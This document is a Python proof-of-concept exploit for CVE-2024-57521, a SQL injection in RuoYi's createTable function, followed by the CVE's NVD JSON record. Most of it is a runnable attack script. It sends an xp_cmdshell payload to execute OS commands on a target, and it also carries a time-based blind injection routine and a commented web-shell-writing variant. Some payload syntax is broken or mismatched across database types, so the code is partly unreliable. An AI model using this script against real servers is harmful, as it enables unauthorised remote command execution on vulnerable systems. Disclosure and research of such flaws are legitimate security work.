CVE-2024-57521

import requests import sys # CVE-2024-57521 SQL Injection PoC for RuoYi v4.7.9 and before # Target: RuoYi SqlUtil.java createTable function def exploit(target_url, cmd): """ SQL Injection PoC - Execute arbitrary SQL commands Target: /xxx/createTable or similar endpoint using SqlUtil.createTable() """ # Malicious SQL payload to execute system commands payload = f"'; EXEC xp_cmdshell '{cmd}' --" # Alternative payload for MySQL # payload = f"'; SELECT * FROM INTO OUTFILE '/var/www/html/shell.php' --" data = { 'tableName': payload, 'tableComment': 'injected' } try: response = requests.post(target_url, data=data, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") def blind_injection(target_url): """ Time-based blind SQL injection to extract data """ # Time-based blind injection payload payload = "'; IF(1=1, SLEEP(5), 0) --" data = { 'tableName': payload, 'tableComment': 'test' } print("[*] Sending blind SQL injection payload...") try: response = requests.post(target_url, data=data, timeout=15) print(f"[*] Response: {response.text[:200]}") except requests.exceptions.Timeout: print("[+] Blind injection confirmed - SLEEP executed!") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2024_57521.py <target_url> [command]") print("Example: python cve_2024_57521.py http://target.com/api/createTable whoami") sys.exit(1) target = sys.argv[1] cmd = sys.argv[2] if len(sys.argv) > 2 else "whoami" print(f"[*] Target: {target}") print(f"[*] Command: {cmd}") exploit(target, cmd)

{"cve": {"id": "CVE-2024-57521", "sourceIdentifier": "[email protected]", "published": "2025-12-23T17:15:46.723", "lastModified": "2026-01-06T17:34:03.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL Injection vulnerability in RuoYi v.4.7.9 and before allows a remote attacker to execute arbitrary code via the createTable function in SqlUtil.java."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruoyi:ruoyi:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.9", "matchCriteriaId": "23C8B479-ECDA-4F19-8547-4129C63F3E0E"}]}]}], "references": [{"url": "https://gitee.com/y_project/RuoYi/commit/ddd858ca732618a472b10eaab2f8e4b45812ffc5", "source": "[email protected]", "tags": ["Patch", "Permissions Required"]}, {"url": "https://gitee.com/y_project/RuoYi/issues/IBC976", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/mrlihd/CVE-2024-57521-SQL-Injection-PoC/blob/main/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/mrlihd/Ruoyi-4.7.9-SQL-Injection-PoC", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}